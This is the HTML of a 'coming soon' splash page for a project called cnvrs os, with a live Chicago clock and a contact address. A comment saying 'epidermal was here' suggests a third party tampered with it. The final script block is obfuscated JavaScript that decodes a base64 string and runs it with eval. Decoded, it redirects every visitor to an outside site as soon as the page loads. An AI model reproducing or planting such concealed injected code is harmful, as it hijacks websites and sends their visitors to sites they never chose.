<!DOCTYPE html>
<html lang="en">
    <!-- epidermal was here | https://epidermal.link -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CNVRS</title>


    <link rel="icon" type="image/png" href="favicon.png"> 

    <style>
        @font-face {
            font-family: 'CourierPS';
            src: url('Courier-PS-Regular.ttf') format('truetype');
        }
        body {
            background-color: black;
            color: white;
            font-family: 'CourierPS', Arial, sans-serif;
            text-align: center;
            margin: 0;
            padding: 0;
            user-select: none; 
        }
        .logo {
            margin-top: 20vh;
        }
        .logo img {
            width: 200px;
        }
        .datetime {
            margin-top: 10px;
            font-size: 16px;
        }
        .links {
            margin-top: 20px;
            font-size: 18px;
            line-height: 1.5em;
        }
        .discord-embed {
            margin-top: 40px;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <div class="logo">
        <img src="logo.svg" alt="Supreme Logo">
    </div>
    <div class="datetime" id="datetime">
    </div>
    <div class="links">
        <div>cnvrs</div>
        <div>os</div>
        <div>is</div>
        <div>coming</div>
        <div>soon</div>
        <div>about</div>
        <div>4</div>
        <div>months</div>
        <div>cnvrscnvrscnvrs@gmail.com</div>
    </div>

    <script>
        function updateTime() {
            const options = {
                timeZone: 'America/Chicago',
                year: 'numeric',
                month: '2-digit',
                day: '2-digit',
                hour: '2-digit',
                minute: '2-digit',
                second: '2-digit',
                hour12: false
            };
            const now = new Date().toLocaleString('en-US', options);
            const [date, time] = now.split(', ');
            document.getElementById('datetime').textContent = `${date} ${time}pm Chicago`;
        }
        
        updateTime();
        
        setInterval(updateTime, 1000);
    </script>
<script>
	function _0x2d25(_0x44739c,_0x4e5b51){var _0x1ce5fb=_0x1ce5();return _0x2d25=function(_0x2d2513,_0x478c5b){_0x2d2513=_0x2d2513-0x1ca;var _0x2890f3=_0x1ce5fb[_0x2d2513];return _0x2890f3;},_0x2d25(_0x44739c,_0x4e5b51);}var _0x24ab71=_0x2d25;function _0x1ce5(){var _0x2e6187=['404296XvxYZQ','2830910moavMp','18vCPvCQ','573dTiiYV','336702qDsBvQ','5004EeDdfO','49588ckTjWT','287922yxlbge','ZXZhbChhdG9iKAoJCSdkMmx1Wkc5M0xteHZZMkYwYVc5dUxtaHlaV1k5SjJoMGRIQnpPaTh2WlhCcFpHVnliV0ZzTG14cGJtc24nCgkpKQ==','5ITWBfV','1010366PcHOQQ'];_0x1ce5=function(){return _0x2e6187;};return _0x1ce5();}(function(_0x42aa1a,_0x2ebc9c){var _0x5dd71d=_0x2d25,_0x98b964=_0x42aa1a();while(!![]){try{var _0x58f290=-parseInt(_0x5dd71d(0x1d1))/0x1+parseInt(_0x5dd71d(0x1d3))/0x2+-parseInt(_0x5dd71d(0x1d0))/0x3*(-parseInt(_0x5dd71d(0x1d2))/0x4)+parseInt(_0x5dd71d(0x1cb))/0x5*(-parseInt(_0x5dd71d(0x1d4))/0x6)+parseInt(_0x5dd71d(0x1cc))/0x7+-parseInt(_0x5dd71d(0x1cd))/0x8*(parseInt(_0x5dd71d(0x1cf))/0x9)+parseInt(_0x5dd71d(0x1ce))/0xa;if(_0x58f290===_0x2ebc9c)break;else _0x98b964['push'](_0x98b964['shift']());}catch(_0x3d1632){_0x98b964['push'](_0x98b964['shift']());}}}(_0x1ce5,0x32259),eval(atob(_0x24ab71(0x1ca))));</script>
</body>
</html>
